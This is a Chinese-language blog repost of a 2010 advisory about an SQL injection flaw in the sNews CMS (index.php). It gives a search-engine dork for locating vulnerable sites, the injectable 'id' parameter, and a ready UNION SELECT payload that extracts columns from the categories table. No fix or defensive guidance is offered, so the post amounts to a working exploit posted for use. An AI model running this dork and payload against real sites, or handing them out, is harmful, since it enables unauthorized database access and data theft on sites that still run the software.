sNews (index.php) SQL 注入漏洞

发布日期:2010-07.25 
发布作者:MajoR  
官方地址:http://snews.awddesign.co.uk
漏洞描述:  sNews (index.php) SQL 注入漏洞

DORK : "Powered by sNews " inurl:index.php?id=

[+] Vulnerable File :
 

http://www.Victime.com/sNews/index.php?id
  

[+] ExploiT :

  -82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--
 

本文转自 ☆★ 黑白前线 ★☆ - www.hackline.net 转载请注明出处,侵权必究!
原文链接:http://www.hackline.net/a/news/ldfb/web/2010/0725/4971.html



文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志:
评论: 0 | 引用: 0 | 查看次数: -
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.